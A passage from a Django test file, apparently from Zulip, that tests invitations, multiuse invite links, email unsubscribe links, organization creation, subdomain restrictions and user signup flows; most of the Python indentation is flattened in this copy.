self.assertEqual(
ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
).count(),
1,
)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(
original_timestamp, scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
)
def test_accessing_invites_in_another_realm(self) -> None:
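        """
        Resending or deleting an invitation that belongs to another realm
        should fail as if the invitation did not exist.
        """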
inviter = UserProfile.objects.exclude(realm=get_realm("zulip")).first()
prereg_user = PreregistrationUser.objects.create(
email="email", referred_by=inviter, realm=inviter.realm
)
self.login("iago")
error_result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_error(error_result, "No such invitation")
error_result = self.client_delete("/json/invites/" + str(prereg_user.id))
self.assert_json_error(error_result, "No such invitation")
def test_prereg_user_status(self) -> None:
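        """
        A PreregistrationUser starts out with status 0 and is marked
        STATUS_ACTIVE once registration completes.
        """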
email = self.nonreg_email("alice")
password = "password"
realm = get_realm("zulip")
inviter = UserProfile.objects.filter(realm=realm).first()
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
result = self.client_post(
"/accounts/register/",
{"key": registration_key, "from_confirmation": "1", "full_name": "alice"},
)
self.assertEqual(result.status_code, 200)
confirmation = Confirmation.objects.get(confirmation_key=registration_key)
prereg_user = confirmation.content_object
self.assertEqual(prereg_user.status, 0)
result = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(result.status_code, 302)
prereg_user = PreregistrationUser.objects.get(email=email, referred_by=inviter, realm=realm)
self.assertEqual(prereg_user.status, confirmation_settings.STATUS_ACTIVE)
user = get_user_by_delivery_email(email, realm)
self.assertIsNotNone(user)
self.assertEqual(user.delivery_email, email)
class InviteeEmailsParserTests(ZulipTestCase):
def setUp(self) -> None:
super().setUp()
self.email1 = "email1@zulip.com"
self.email2 = "email2@zulip.com"
self.email3 = "email3@zulip.com"
    def test_if_emails_separated_by_commas_are_parsed_and_stripped_correctly(self) -> None:
emails_raw = f"{self.email1} ,{self.email2}, {self.email3}"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
    def test_if_emails_separated_by_newlines_are_parsed_and_stripped_correctly(self) -> None:
emails_raw = f"{self.email1}\n {self.email2}\n {self.email3} "
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_from_email_client_separated_by_newlines_are_parsed_correctly(self) -> None:
emails_raw = (
f"Email One <{self.email1}>\nEmailTwo<{self.email2}>\nEmail Three<{self.email3}>"
)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_in_mixed_style_are_parsed_correctly(self) -> None:
emails_raw = f"Email One <{self.email1}>,EmailTwo<{self.email2}>\n{self.email3}"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
class MultiuseInviteTest(ZulipTestCase):
def setUp(self) -> None:
super().setUp()
self.realm = get_realm("zulip")
self.realm.invite_required = True
self.realm.save()
def generate_multiuse_invite_link(
self, streams: Optional[List[Stream]] = None, date_sent: Optional[datetime.datetime] = None
) -> str:
invite = MultiuseInvite(realm=self.realm, referred_by=self.example_user("iago"))
invite.save()
if streams is not None:
invite.streams.set(streams)
if date_sent is None:
date_sent = timezone_now()
key = generate_key()
Confirmation.objects.create(
content_object=invite,
date_sent=date_sent,
confirmation_key=key,
type=Confirmation.MULTIUSE_INVITE,
)
return confirmation_url(key, self.realm, Confirmation.MULTIUSE_INVITE)
def check_user_able_to_register(self, email: str, invite_link: str) -> None:
password = "password"
result = self.client_post(invite_link, {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
from django.core.mail import outbox
outbox.pop()
def test_valid_multiuse_link(self) -> None:
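        """
        A multiuse invite link that has not expired can be used by multiple
        users to register.
        """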
email1 = self.nonreg_email("test")
email2 = self.nonreg_email("test1")
email3 = self.nonreg_email("alice")
date_sent = timezone_now() - datetime.timedelta(
days=settings.INVITATION_LINK_VALIDITY_DAYS - 1
)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
self.check_user_able_to_register(email1, invite_link)
self.check_user_able_to_register(email2, invite_link)
self.check_user_able_to_register(email3, invite_link)
def test_expired_multiuse_link(self) -> None:
email = self.nonreg_email("newuser")
date_sent = timezone_now() - datetime.timedelta(days=settings.INVITATION_LINK_VALIDITY_DAYS)
invite_link = self.generate_multiuse_invite_link(date_sent=date_sent)
result = self.client_post(invite_link, {"email": email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("The confirmation link has expired or been deactivated.", result)
def test_invalid_multiuse_link(self) -> None:
email = self.nonreg_email("newuser")
invite_link = "/join/invalid_key/"
result = self.client_post(invite_link, {"email": email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("Whoops. The confirmation link is malformed.", result)
def test_invalid_multiuse_link_in_open_realm(self) -> None:
self.realm.invite_required = False
self.realm.save()
email = self.nonreg_email("newuser")
invite_link = "/join/invalid_key/"
with patch("zerver.views.registration.get_realm_from_request", return_value=self.realm):
with patch("zerver.views.registration.get_realm", return_value=self.realm):
self.check_user_able_to_register(email, invite_link)
def test_multiuse_link_with_specified_streams(self) -> None:
name1 = "newuser"
name2 = "bob"
email1 = self.nonreg_email(name1)
email2 = self.nonreg_email(name2)
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email1, invite_link)
self.check_user_subscribed_only_to_streams(name1, streams)
stream_names = ["Rome", "Verona"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
invite_link = self.generate_multiuse_invite_link(streams=streams)
self.check_user_able_to_register(email2, invite_link)
self.check_user_subscribed_only_to_streams(name2, streams)
def test_create_multiuse_link_api_call(self) -> None:
self.login("iago")
result = self.client_post("/json/invites/multiuse")
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
def test_create_multiuse_link_with_specified_streams_api_call(self) -> None:
self.login("iago")
stream_names = ["Rome", "Scotland", "Venice"]
streams = [get_stream(stream_name, self.realm) for stream_name in stream_names]
stream_ids = [stream.id for stream in streams]
result = self.client_post(
"/json/invites/multiuse", {"stream_ids": orjson.dumps(stream_ids).decode()}
)
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
self.check_user_subscribed_only_to_streams("test", streams)
def test_only_admin_can_create_multiuse_link_api_call(self) -> None:
self.login("iago")
# Only admins should be able to create multiuse invites even if
# invite_to_realm_policy is set to Realm.POLICY_MEMBERS_ONLY.
self.realm.invite_to_realm_policy = Realm.POLICY_MEMBERS_ONLY
self.realm.save()
result = self.client_post("/json/invites/multiuse")
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
self.login("hamlet")
result = self.client_post("/json/invites/multiuse")
self.assert_json_error(result, "Must be an organization administrator")
def test_multiuse_link_for_inviting_as_owner(self) -> None:
self.login("iago")
result = self.client_post(
"/json/invites/multiuse",
{"invite_as": orjson.dumps(PreregistrationUser.INVITE_AS["REALM_OWNER"]).decode()},
)
self.assert_json_error(result, "Must be an organization owner")
self.login("desdemona")
result = self.client_post(
"/json/invites/multiuse",
{"invite_as": orjson.dumps(PreregistrationUser.INVITE_AS["REALM_OWNER"]).decode()},
)
self.assert_json_success(result)
invite_link = result.json()["invite_link"]
self.check_user_able_to_register(self.nonreg_email("test"), invite_link)
def test_create_multiuse_link_invalid_stream_api_call(self) -> None:
self.login("iago")
result = self.client_post(
"/json/invites/multiuse", {"stream_ids": orjson.dumps([54321]).decode()}
)
self.assert_json_error(result, "Invalid stream id 54321. No invites were sent.")
class EmailUnsubscribeTests(ZulipTestCase):
def test_error_unsubscribe(self) -> None:
# An invalid unsubscribe token "test123" produces an error.
result = self.client_get("/accounts/unsubscribe/missed_messages/test123")
self.assert_in_response("Unknown email unsubscribe request", result)
# An unknown message type "fake" produces an error.
user_profile = self.example_user("hamlet")
unsubscribe_link = one_click_unsubscribe_link(user_profile, "fake")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assert_in_response("Unknown email unsubscribe request", result)
def test_message_notification_emails_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in message notification emails
that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user("hamlet")
user_profile.enable_offline_email_notifications = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile, "missed_messages")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_offline_email_notifications)
def test_welcome_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in welcome e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user("hamlet")
# Simulate a new user signing up, which enqueues 2 welcome e-mails.
enqueue_welcome_emails(user_profile)
self.assertEqual(2, ScheduledEmail.objects.filter(users=user_profile).count())
# Simulate unsubscribing from the welcome e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "welcome")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The welcome email jobs are no longer scheduled.
self.assertEqual(result.status_code, 200)
self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())
def test_digest_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in digest e-mails that you can
click even when logged out to stop receiving them.
Unsubscribing from these emails also dequeues any digest email jobs that
have been queued.
"""
user_profile = self.example_user("hamlet")
self.assertTrue(user_profile.enable_digest_emails)
# Enqueue a fake digest email.
context = {
"name": "",
"realm_uri": "",
"unread_pms": [],
"hot_conversations": [],
"new_users": [],
"new_streams": {"plain": []},
"unsubscribe_link": "",
}
send_future_email(
"zerver/emails/digest",
user_profile.realm,
to_user_ids=[user_profile.id],
context=context,
)
self.assertEqual(1, ScheduledEmail.objects.filter(users=user_profile).count())
# Simulate unsubscribing from digest e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "digest")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
# The setting is toggled off, and scheduled jobs have been removed.
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_digest_emails)
self.assertEqual(0, ScheduledEmail.objects.filter(users=user_profile).count())
def test_login_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in login
e-mails that you can click even when logged out to update your
email notification settings.
"""
user_profile = self.example_user("hamlet")
user_profile.enable_login_emails = True
user_profile.save()
unsubscribe_link = one_click_unsubscribe_link(user_profile, "login")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_login_emails)
def test_marketing_unsubscribe(self) -> None:
"""
We provide one-click unsubscribe links in marketing e-mails that you can
click even when logged out to stop receiving them.
"""
user_profile = self.example_user("hamlet")
self.assertTrue(user_profile.enable_marketing_emails)
# Simulate unsubscribing from marketing e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "marketing")
result = self.client_get(urllib.parse.urlparse(unsubscribe_link).path)
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_marketing_emails)
def test_marketing_unsubscribe_post(self) -> None:
"""
The List-Unsubscribe-Post header lets email clients trigger an
automatic unsubscription request via POST (see RFC 8058), so
test that too.
"""
user_profile = self.example_user("hamlet")
self.assertTrue(user_profile.enable_marketing_emails)
# Simulate unsubscribing from marketing e-mails.
unsubscribe_link = one_click_unsubscribe_link(user_profile, "marketing")
client = Client(enforce_csrf_checks=True)
result = client.post(
urllib.parse.urlparse(unsubscribe_link).path, {"List-Unsubscribe": "One-Click"}
)
self.assertEqual(result.status_code, 200)
# Circumvent user_profile caching.
user_profile.refresh_from_db()
self.assertFalse(user_profile.enable_marketing_emails)
class RealmCreationTest(ZulipTestCase):
@override_settings(OPEN_REALM_CREATION=True)
def check_able_to_create_realm(self, email: str, password: str = "test") -> None:
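        """
        Walk through the full realm creation flow for the given email: request
        a creation link, confirm it, submit the registration form, and verify
        the new realm's owner, defaults, welcome messages, and audit log.
        """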
notification_bot = get_system_bot(settings.NOTIFICATION_BOT)
signups_stream, _ = create_stream_if_needed(notification_bot.realm, "signups")
string_id = "zuliptest"
# Make sure the realm does not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
# Create new realm with the email
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Check confirmation email has the correct subject and body, extract
# confirmation link and visit it
confirmation_url = self.get_confirmation_url_from_outbox(
email,
email_subject_contains="Create your Zulip organization",
email_body_contains="You have requested a new Zulip organization",
)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, realm_subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertTrue(
result["Location"].startswith("http://zuliptest.testserver/accounts/login/subdomain/")
)
# Make sure the realm is created
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
user = get_user(email, realm)
self.assertEqual(user.realm, realm)
# Check that user is the owner.
self.assertEqual(user.role, UserProfile.ROLE_REALM_OWNER)
# Check defaults
self.assertEqual(realm.org_type, Realm.CORPORATE)
self.assertEqual(realm.emails_restricted_to_domains, False)
self.assertEqual(realm.invite_required, True)
# Check welcome messages
for stream_name, text, message_count in [
(Realm.DEFAULT_NOTIFICATION_STREAM_NAME, "with the topic", 3),
(Realm.INITIAL_PRIVATE_STREAM_NAME, "private stream", 1),
]:
stream = get_stream(stream_name, realm)
recipient = stream.recipient
messages = Message.objects.filter(recipient=recipient).order_by("date_sent")
self.assert_length(messages, message_count)
self.assertIn(text, messages[0].content)
# Check signup messages
recipient = signups_stream.recipient
messages = Message.objects.filter(recipient=recipient).order_by("id")
self.assert_length(messages, 2)
self.assertIn("Signups enabled", messages[0].content)
self.assertIn("signed up", messages[1].content)
self.assertEqual("zuliptest", messages[1].topic_name())
realm_creation_audit_log = RealmAuditLog.objects.get(
realm=realm, event_type=RealmAuditLog.REALM_CREATED
)
self.assertEqual(realm_creation_audit_log.acting_user, user)
self.assertEqual(realm_creation_audit_log.event_time, realm.date_created)
# Piggyback a little check for how we handle
# empty string_ids.
realm.string_id = ""
self.assertEqual(realm.display_subdomain, ".")
def test_create_realm_non_existing_email(self) -> None:
self.check_able_to_create_realm("user1@test.com")
def test_create_realm_existing_email(self) -> None:
self.check_able_to_create_realm("hamlet@zulip.com")
@override_settings(AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",))
def test_create_realm_ldap_email(self) -> None:
self.init_default_ldap_database()
with self.settings(LDAP_EMAIL_ATTR="mail"):
self.check_able_to_create_realm(
"newuser_email@zulip.com", self.ldap_password("newuser_with_email")
)
def test_create_realm_as_system_bot(self) -> None:
result = self.client_post("/new/", {"email": "notification-bot@zulip.com"})
self.assertEqual(result.status_code, 200)
self.assert_in_response("notification-bot@zulip.com is reserved for system bots", result)
def test_create_realm_no_creation_key(self) -> None:
"""
Trying to create a realm without a creation_key should fail when
OPEN_REALM_CREATION is false.
"""
email = "user1@test.com"
with self.settings(OPEN_REALM_CREATION=False):
# Create new realm with the email, but no creation key.
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 200)
self.assert_in_response("New organization creation disabled", result)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_with_subdomain(self) -> None:
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
# Make sure the realm does not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
# Create new realm with the email
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email, password, realm_subdomain=string_id, realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
result = self.client_get(result.url, subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zuliptest.testserver")
# Make sure the realm is created
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True, FREE_TRIAL_DAYS=30)
def test_create_realm_during_free_trial(self) -> None:
password = "test"
string_id = "zuliptest"
email = "user1@test.com"
realm_name = "Test"
with self.assertRaises(Realm.DoesNotExist):
get_realm(string_id)
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email, password, realm_subdomain=string_id, realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
result = self.client_get(result.url, subdomain=string_id)
self.assertEqual(result.url, "http://zuliptest.testserver/upgrade/?onboarding=true")
result = self.client_get(result.url, subdomain=string_id)
self.assert_in_success_response(["Not ready to start your trial?"], result)
realm = get_realm(string_id)
self.assertEqual(realm.string_id, string_id)
self.assertEqual(get_user(email, realm).realm, realm)
self.assertEqual(realm.name, realm_name)
self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_two_realms(self) -> None:
"""
Verify correct behavior and PreregistrationUser handling when using
two pre-generated realm creation links to create two different realms.
"""
password = "test"
first_string_id = "zuliptest"
second_string_id = "zuliptest2"
email = "user1@test.com"
first_realm_name = "Test"
second_realm_name = "Test"
# Make sure the realms do not exist
with self.assertRaises(Realm.DoesNotExist):
get_realm(first_string_id)
with self.assertRaises(Realm.DoesNotExist):
get_realm(second_string_id)
# Now we pre-generate two realm creation links
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
first_confirmation_url = self.get_confirmation_url_from_outbox(email)
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 1)
# Get a second realm creation link.
result = self.client_post("/new/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/new/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
second_confirmation_url = self.get_confirmation_url_from_outbox(email)
self.assertNotEqual(first_confirmation_url, second_confirmation_url)
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 2)
# Create and verify the first realm
result = self.client_get(first_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain=first_string_id,
realm_name=first_realm_name,
key=first_confirmation_url.split("/")[-1],
)
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(first_string_id)
self.assertEqual(realm.string_id, first_string_id)
self.assertEqual(realm.name, first_realm_name)
# One of the PreregistrationUsers should have been used up:
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 1)
# Create and verify the second realm
result = self.client_get(second_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain=second_string_id,
realm_name=second_realm_name,
key=second_confirmation_url.split("/")[-1],
)
self.assertEqual(result.status_code, 302)
# Make sure the realm is created
realm = get_realm(second_string_id)
self.assertEqual(realm.string_id, second_string_id)
self.assertEqual(realm.name, second_realm_name)
# The remaining PreregistrationUser should have been used up:
self.assertEqual(PreregistrationUser.objects.filter(email=email, status=0).count(), 0)
@override_settings(OPEN_REALM_CREATION=True)
def test_mailinator_signup(self) -> None:
result = self.client_post("/new/", {"email": "hi@mailinator.com"})
self.assert_in_response("Please use your real email address.", result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions(self) -> None:
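        """
        Subdomains that are too short, malformed, or reserved are rejected
        with the appropriate error; a valid subdomain succeeds.
        """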
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
errors = {
"id": "length 3 or greater",
"-id": "cannot start or end with a",
"string-ID": "lowercase letters",
"string_id": "lowercase letters",
"stream": "unavailable",
"streams": "unavailable",
"about": "unavailable",
"abouts": "unavailable",
"zephyr": "unavailable",
}
for string_id, error_msg in errors.items():
result = self.submit_reg_form_for_user(
email, password, realm_subdomain=string_id, realm_name=realm_name
)
self.assert_in_response(error_msg, result)
# test valid subdomain
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="a-0", realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://a-0.testserver/accounts/login/subdomain/"))
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_using_old_subdomain_of_a_realm(self) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-name", acting_user=None)
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="zulip", realm_name=realm_name
)
self.assert_in_response("Subdomain unavailable. Please choose a different one.", result)
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="", realm_name=realm_name
)
self.assert_in_response("unavailable", result)
# test valid use of root domain
result = self.submit_reg_form_for_user(
email, password, realm_subdomain="", realm_name=realm_name
)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://testserver/accounts/login/subdomain/"))
@override_settings(OPEN_REALM_CREATION=True)
def test_subdomain_restrictions_root_domain_option(self) -> None:
password = "test"
email = "user1@test.com"
realm_name = "Test"
result = self.client_post("/new/", {"email": email})
self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
self.client_get(confirmation_url)
# test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain="abcdef",
realm_in_root_domain="true",
realm_name=realm_name,
)
self.assert_in_response("unavailable", result)
# test valid use of root domain
result = self.submit_reg_form_for_user(
email,
password,
realm_subdomain="abcdef",
realm_in_root_domain="true",
realm_name=realm_name,
)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.startswith("http://testserver/accounts/login/subdomain/"))
def test_is_root_domain_available(self) -> None:
self.assertTrue(is_root_domain_available())
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
self.assertFalse(is_root_domain_available())
realm = get_realm("zulip")
realm.string_id = Realm.SUBDOMAIN_FOR_ROOT_DOMAIN
realm.save()
self.assertFalse(is_root_domain_available())
def test_subdomain_check_api(self) -> None:
result = self.client_get("/json/realm/subdomain/zulip")
self.assert_in_success_response(
["Subdomain unavailable. Please choose a different one."], result
)
result = self.client_get("/json/realm/subdomain/zu_lip")
self.assert_in_success_response(
["Subdomain can only have lowercase letters, numbers, and '-'s."], result
)
result = self.client_get("/json/realm/subdomain/hufflepuff")
self.assert_in_success_response(["available"], result)
self.assert_not_in_success_response(["unavailable"], result)
def test_subdomain_check_management_command(self) -> None:
# Short names should not work, even with the flag
with self.assertRaises(ValidationError):
check_subdomain_available("aa")
with self.assertRaises(ValidationError):
check_subdomain_available("aa", allow_reserved_subdomain=True)
# Malformed names should never work
with self.assertRaises(ValidationError):
check_subdomain_available("-ba_d-")
with self.assertRaises(ValidationError):
check_subdomain_available("-ba_d-", allow_reserved_subdomain=True)
with patch("zerver.lib.name_restrictions.is_reserved_subdomain", return_value=False):
# Existing realms should never work even if they are not reserved keywords
with self.assertRaises(ValidationError):
check_subdomain_available("zulip")
with self.assertRaises(ValidationError):
check_subdomain_available("zulip", allow_reserved_subdomain=True)
# Reserved ones should only work with the flag
with self.assertRaises(ValidationError):
check_subdomain_available("stream")
check_subdomain_available("stream", allow_reserved_subdomain=True)
class UserSignUpTest(InviteUserBase):
def _assert_redirected_to(self, result: HttpResponse, url: str) -> None:
self.assertEqual(result.status_code, 302)
self.assertEqual(result["LOCATION"], url)
def verify_signup(
self,
*,
email: str = "newguy@zulip.com",
password: Optional[str] = "newpassword",
full_name: str = "New user's name",
realm: Optional[Realm] = None,
subdomain: Optional[str] = None,
) -> UserProfile:
"""Common test function for signup tests. It is a goal to use this
common function for all signup tests to avoid code duplication; doing
so will likely require adding new parameters."""
if realm is None: # nocoverage
realm = get_realm("zulip")
client_kwargs: Dict[str, Any] = {}
if subdomain:
client_kwargs["subdomain"] = subdomain
result = self.client_post("/accounts/home/", {"email": email}, **client_kwargs)
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"], **client_kwargs)
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, **client_kwargs)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS. This should create our
# account, log us in, and redirect to the app.
result = self.submit_reg_form_for_user(
email, password, full_name=full_name, **client_kwargs
)
# Verify that we were served a redirect to the app.
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://lear.testserver/")
# Verify that we successfully logged in.
user_profile = get_user(email, realm)
self.assert_logged_in_user_id(user_profile.id)
return user_profile
def test_bad_email_configuration_for_accounts_home(self) -> None:
"""
Make sure we redirect for EmailNotDeliveredException.
"""
email = self.nonreg_email("newguy")
smtp_mock = patch(
"zerver.views.registration.send_confirm_registration_email",
side_effect=EmailNotDeliveredException,
)
with smtp_mock, self.assertLogs(level="ERROR") as m:
result = self.client_post("/accounts/home/", {"email": email})
self._assert_redirected_to(result, "/config-error/smtp")
self.assertEqual(m.output, ["ERROR:root:Error in accounts_home"])
def test_bad_email_configuration_for_create_realm(self) -> None:
"""
Make sure we redirect for EmailNotDeliveredException.
"""
email = self.nonreg_email("newguy")
smtp_mock = patch(
"zerver.views.registration.send_confirm_registration_email",
side_effect=EmailNotDeliveredException,
)
with smtp_mock, self.assertLogs(level="ERROR") as m:
result = self.client_post("/new/", {"email": email})
self._assert_redirected_to(result, "/config-error/smtp")
self.assertEqual(m.output, ["ERROR:root:Error in create_realm"])
def test_user_default_language_and_timezone(self) -> None:
"""
Check if the default language of new user is the default language
of the realm.
"""
email = self.nonreg_email("newguy")
password = "newpassword"
timezone = "US/Mountain"
realm = get_realm("zulip")
do_set_realm_property(realm, "default_language", "de", acting_user=None)
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, timezone=timezone)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user("newguy")
self.assertEqual(user_profile.default_language, realm.default_language)
self.assertEqual(user_profile.timezone, timezone)
from django.core.mail import outbox
outbox.pop()
def test_default_twenty_four_hour_time(self) -> None:
"""
Check if the default twenty_four_hour_time setting of new user
is the default twenty_four_hour_time of the realm.
"""
email = self.nonreg_email("newguy")
password = "newpassword"
realm = get_realm("zulip")
do_set_realm_property(realm, "default_twenty_four_hour_time", True, acting_user=None)
result = self.client_post("/accounts/home/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
